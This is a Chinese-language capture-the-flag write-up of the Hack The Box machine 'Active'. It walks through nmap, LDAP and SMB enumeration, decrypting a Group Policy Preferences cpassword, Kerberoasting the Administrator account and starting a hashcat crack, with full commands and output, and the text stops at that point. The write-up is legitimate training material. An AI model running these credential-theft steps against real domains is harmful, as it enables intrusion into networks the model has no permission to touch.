Active Writeup
免責聲明
我只是個初學者,但寫writeup能讓我變強,大概吧QQ
Please correct me if I'm wrong.
遇到不熟悉的技術,即使簡單也有點難。一直以來莫名的排斥Windows,沒有認真地理解Active Directory,真的非常愚蠢,所以把這次回顧多年前沒有完成的靶機,當作跨出的第一步吧!Active算是Hack The Box元老級的AD box了,同時也推薦在TJnull的OSCP靶機清單裡,適合新手練習AD相關技術,從如何使用SMB、解密GPP密碼1到Kerberoasting2取得Hash後暴力破解,都是基礎中的基礎。
靶機資訊(Machine Infromation)
Machine | Description |
---|---|
Name | Active |
OS | :simple-windows95: Windows |
Difficulty | Easy |
Author | eks mrb3n |
情蒐(Reconnaissance)
服務掃描(Services Scan)
一如往常,把nmap
掃描分兩次,第一次快速掃所有tcp ports,第二次選有興趣的ports詳細掃(-sC
for default script scan, -sV
for version detection),不然一開始就全掃會跑很久。這台靶機勢必設有Active Directory(AD),畢竟都叫Active了,對吧?若要實際點的話,在第一次快速掃瞄列出的不少Windows服務ports中出現:Kerberos, SMB, LDAP等,基本上就八九不離十了;如果看詳細一點的二次掃描就更清楚了。
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
...
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s
| smb2-time:
| date: 2023-05-29T02:20:58
|_ start_date: 2023-05-29T01:55:51
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -p- --min-rate 4242 -o recons/nmap/active-alltcp-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:14 CDT
Nmap scan report for 10.129.122.239
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -sCV -o recons/nmap/active-targeted-cv-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:15 CDT
Nmap scan report for 10.129.122.239
Host is up (0.056s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s
| smb2-time:
| date: 2023-05-29T02:20:58
|_ start_date: 2023-05-29T01:55:51
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds
話雖如此,但我這次懶得調整指令,所以直接全部詳細掃,想也知道一定掃非常久,所以在這段等待期間,就先嘗試其他手動探勘。目前最想找出domain name。當然,也可以去沖一杯咖啡,然後看到掃完結果的是active.htb
。
<MACHING_NAME>.htb 是HTB靶機hostname的常見命名規則。你可以在HTB Meta找到更多資訊。
LDAP詳列(LDAP Enumerate) - Port 389
因為快掃有列出LDAP,所以利用ldapsearch
搜尋AD相關資訊,首先問出domain name:active.htb
。
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b "" -s base defaultNamingContext
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: defaultNamingContext
#
#
dn:
defaultNamingContext: DC=active,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b 'DC=active,DC=htb' -D '' -w ''
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1
# numResponses: 1
看來還是需要帳密才能進一步詳列資訊。
本階段其餘完成事項
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig -x 10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> -x 10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15559
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 3b8c232ab38e91a3bfda3e4564740cfe6cdc017eb9b3576f (good)
;; QUESTION SECTION:
;239.122.129.10.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
10.in-addr.arpa. 86400 IN SOA localhost. . 1 28800 7200 604800 86400
;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Sun May 28 21:25:02 CDT 2023
;; MSG SIZE rcvd: 128
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig AXFR @10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> AXFR @10.129.122.239
; (1 server found)
;; global options: +cmd
;; Query time: 52 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Thu Jun 01 04:09:05 CDT 2023
;; MSG SIZE rcvd: 40
I don't know why I even tried digging localhost at this point.
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig localhost @10.129.122.239
; <<>> DiG 9.18.12-1-Debian <<>> localhost @10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 56014
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 847a6883003e4dbf (echoed)
;; QUESTION SECTION:
;localhost. IN A
;; Query time: 63 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Sun May 28 21:25:08 CDT 2023
;; MSG SIZE rcvd: 50
SMB詳列(SMB Enumerate) - Port 445
先從試試看無帳密連線(Anonymous),也許可以取得一些共享資料夾,以下是幾種列出SMB Share的方式:
基本上用crackmapexec
就不需要試其他兩個工具了,個人只是沒事想測測看而已。
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u '' -p '' --shares
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\:
SMB 10.129.122.239 445 DC [+] Enumerated shares
SMB 10.129.122.239 445 DC Share Permissions Remark
SMB 10.129.122.239 445 DC ----- ----------- ------
SMB 10.129.122.239 445 DC ADMIN$ Remote Admin
SMB 10.129.122.239 445 DC C$ Default share
SMB 10.129.122.239 445 DC IPC$ Remote IPC
SMB 10.129.122.239 445 DC NETLOGON Logon server share
SMB 10.129.122.239 445 DC Replication READ
SMB 10.129.122.239 445 DC SYSVOL Logon server share
SMB 10.129.122.239 445 DC Users
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbclient --no-pass -L //10.129.122.239
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.122.239 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
"Replication"是目前唯一具有讀取權限的share,其中文意思是"副本",也許是管理員的設定備份?因為有點好奇,於是SMB進去看看。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbclient //10.129.122.239/Replication
Password for [WORKGROUP\xavier]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
active.htb D 0 Sat Jul 21 05:37:44 2018
10459647 blocks of size 4096. 5202562 blocks available
smb: \> ls active.htb\
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 05:37:44 2018
Policies D 0 Sat Jul 21 05:37:44 2018
scripts D 0 Wed Jul 18 13:48:57 2018
10459647 blocks of size 4096. 5202927 blocks available
smb: \>
一共列出3個資料夾:DfsrPrivate
、Policies
、scripts
,由於第一眼看不出所以然,於是問問ChatGPT。
Question: Where do following three directories: "DfsrPrivate", "Policies" and "Scripts" come from and what's the purpose of them in AD?
ChatGPT:
The "DfsrPrivate," "Policies," and "Scripts" directories are all related to Active Directory (AD) and serve specific purposes within the system.
- DfsrPrivate:
The "DfsrPrivate" directory is associated with the Distributed File System Replication (DFSR) service in Windows Server. DFSR enables the replication of files between multiple servers and ensures that the data remains consistent across all replicas. The "DfsrPrivate" directory is automatically created on each DFSR member server and contains the private metadata and staging files necessary for replication. It is a hidden system folder that should not be manually modified or deleted. - Policies:
The "Policies" directory is a crucial component of Group Policy in AD. Group Policy allows administrators to manage and configure various settings for user and computer accounts in an organization. The "Policies" directory, located within the SYSVOL shared folder on domain controllers, stores Group Policy objects (GPOs). GPOs contain the settings and preferences that are applied to the targeted user and computer accounts. The "Policies" directory structure organizes GPOs into individual folders based on globally unique identifiers (GUIDs) and version numbers. - Scripts:
The "Scripts" directory is associated with logon and logoff scripts in AD. Logon and logoff scripts are executed when users log on to or log off from a computer in an AD domain. These scripts can perform various tasks, such as mapping network drives, configuring printers, or running custom commands or applications. The "Scripts" directory, located within the SYSVOL shared folder on domain controllers, stores the scripts that are assigned to users or computers through Group Policy. The scripts can be written in different scripting languages, such as VBScript or PowerShell.
In summary, the "DfsrPrivate" directory is used by the DFSR service for file replication, the "Policies" directory is used to store Group Policy objects, and the "Scripts" directory is used to store logon and logoff scripts for executing specific actions during user sessions in an Active Directory environment.
ChatGPT長篇大論的重點是Policies
儲存在SYSVOL
裡,而且剛才列出shares也有出現SYSVOL
(沒有讀取權限),到此為止,我更確定Replication
是備份檔了。雖然可以在SMB慢慢往下找看是否有有趣的檔案,但是我想要下載整個資料夾下來:
smb: \> mask ""
smb: \> recurse on # 下載所有資料夾與檔案
smb: \> prompt off # 關閉就不須每一個檔案都回覆"yes"
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.2 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.3 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.6 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.3 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \>
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbmap -H 10.129.122.239 -R Replication
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 05:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 05:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
從Group Policy Preferences中竊取User密碼
把所有的檔案都看一便,只有Groups.xml
有點意思,裡面寫了username和cpassword。
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
簡單上網搜尋"group.xml hack",就找到從Group Policy Preferences竊取密碼3的文章,內容基本上是說:XML裡面的cpassword
就是AES-256加密後的使用者密碼,不需要暴力破解,就可輕易解密,誰叫微軟在官方技術文件中公開加密金鑰?!同時我也在XML裡面找到AD使用者帳號:active.htb\SVC_TGS
。
詳細內容請參考,另一篇筆記:[透過『群組原則偏好設定』竊取密碼]/zh-tw/Credential-Access/exploit-group-policy-preferences)。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
SMB登入帳密:SVC_TGS:GPPstillStandingStrong2k18
,可以取得更多shares。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.122.239 445 DC [+] Enumerated shares
SMB 10.129.122.239 445 DC Share Permissions Remark
SMB 10.129.122.239 445 DC ----- ----------- ------
SMB 10.129.122.239 445 DC ADMIN$ Remote Admin
SMB 10.129.122.239 445 DC C$ Default share
SMB 10.129.122.239 445 DC IPC$ Remote IPC
SMB 10.129.122.239 445 DC NETLOGON READ Logon server share
SMB 10.129.122.239 445 DC Replication READ
SMB 10.129.122.239 445 DC SYSVOL READ Logon server share
SMB 10.129.122.239 445 DC Users READ
用smbmap
或是crackmapexec
詳列Users
目錄,並在桌面上找到在使用者flag。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users
[+] IP: 10.129.122.239:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
...
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 10:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 10:14:42 2018 ..
fw--w--w-- 34 Thu Jun 1 01:29:06 2023 user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users -A user.txt
[+] IP: 10.129.122.239:445 Name: active.htb
[+] Starting search for files matching 'user.txt' on share Users.
[+] Match found! Downloading: Users\SVC_TGS\Desktop\user.txt
Tip:或是指定檔案下載
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --share Users --get-file SVC_TGS/Desktop/user.txt user.txt
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.122.239 445 DC [*] Copy SVC_TGS/Desktop/user.txt to user.txt
SMB 10.129.122.239 445 DC [+] File SVC_TGS/Desktop/user.txt was transferred to user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -M spider_plus --only-files -o READ_ONLY=false
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.122.239 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SPIDER_P... 10.129.122.239 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.129.122.239 445 DC [*] DIR: ['print$']
SPIDER_P... 10.129.122.239 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.129.122.239 445 DC [*] SIZE: 51200
SPIDER_P... 10.129.122.239 445 DC [*] OUTPUT: /tmp/cme_spider_plus
...
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ find /tmp/cme_spider_plus/10.129.122.239 -type f
...
/tmp/cme_spider_plus/10.129.122.239/Users/SVC_TGS/Desktop/user.txt
...
取得user flag之後就碰壁了,把所以Users
目錄底下的檔案看一遍也沒有用,因為都是預設檔案,所以只能偷看其他人的Writeup,才注意到我完全忘了還有東西還沒看啊!
Kerberoasting - Port 88
不要小看無知的力量,完全忽略AD中重要一環Kerberos就是這麼厲害,只能先從爬文開始,才知道有Kerberoast這個技巧。簡單來說,Kerberoast濫用Kerberos機制取得Ticket Granting Service(TGS)後,離線暴力破解加密TGS的Service密碼。
詳細內容請參考,另一篇筆記:[Kerberoast:機制濫用與暴力破解]/zh-tw/Credential-Access/kerberoast)。
記得加入DC域名到/etc/hosts
取得TGS Hash
利用CrackMapExec進行kerberoasting,你也先可以用LDAP搜尋,確定是否存在具有servicePrincipalName的帳號,再取得它的TGS。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec ldap 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
SMB 10.129.122.239 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP 10.129.122.239 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.122.239 389 DC [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP 10.129.122.239 389 DC sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-18 14:06:40.351723 lastLogon:2023-06-01 01:29:13.530504
LDAP 10.129.122.239 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae62951b4c98375f7aaad3fad9a$c6d7a76920cde0b5b6ab6de83f3f319a333e4002b46aae47e26c8d33750e9fddf0bab41d071c27b16fe672b3d130004fbc014ef785a354ed34bb214e594f029227d491f0ee81d9aa7bfd5a266dca1f622a3dfb143104eea7a6904ed60a0a8017026644eb56c4e4d4896af44e41bced305b065664ab56f8865c3318f6592067bddbb624dd8ee17968080bd3a3d6965a82292a2e5a5e6da01e03ca8146cab3aefed941d356e4e61022338065d6791118c4ca33e2565532200e4daad24373ed6372283516c38a2a29d35d4871b6da2c30a7579ff0610aed49b33d60b27388d413ec427e4fda734688a3a7d938f8fd92ff31a44556d4bc73702f62622dc97510c31f1ed5ad28a8bf90bca7fc2143345ce996c0800d44760c671feb6f7e37649b0fcd961b5e64911d32a2dc2ce66aa48e4d5e463597c872ea884f60790843fbc8d2c2aabeb37037157323f9b9908896068019b153f76847c91b17acac2a414570fae1437f127867385fbf4afb63d955a4d81800170580524859867933897474d11b687955ea6e86c7fbac5b4586a51c7555e681cb2eb33745ff171d549523b3abc813b379f3e764a8e26a0cc9c834707d73b591276f04585a687ec95e01be5c6ea79fdda4c5fac9ba9e045c87c92ea517af0b84625b3bd4cbe22a4881d5f80f43065d6a6d222dad80104522500d8316607f245970a88ae55896618d69c9bb29d5cad7a0dcb09036649ddb21323047c85fb9be1718efdb5401047e2e0435abad297566b15254dad24984969d4081bbf9b614d1e3f8957102db434437010941867a7c14afa0374b3b6f05ff4b828d8197972023a032c61771deff8022f9d9d9cae69a8be38bf86c5e51afee678f76fae7957f35f21e2d99b1cd37599c9d4dcaadbb39da55f5dbcd11b17b965678008938d2e6b8d9a197859cf86063df855c5524a85cdf13e1095dbea130e1fb664a99ff50ff262ec9c693f1b1ba8990cf7f8961901588bb483c1f0aeb4262dd736fdd04e77862aa53ed4e66d8ff3cb7d962f39cddf102849a8b1826b4b56bd9fba5d6a565d29db78a4a178fadba99a24e12559976b4be8e0bee17698448f1c134366ef06af452679da03ffb74858e9d5e0ee9ffdd80142becd7c01496bd119799b9cdf84f855f22408716dd5d2c9942d237273e24b324f1c45c62db7ddf6706233abfb6d32b32c81bc786a16caa67226317cb32772c80c765d5fd8338cc80f74aed3c878c6ff2e136d65a6d6aed9130e8
暴力破解TGS Hash
用hashcat
與字典檔暴力破解hash。
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat --example-hashes | grep krb5tgs -B 11
Hash mode #13100
Name................: Kerberos 5, etype 23, TGS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
...
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt.gz
hashcat (v6.2.6) starting
...
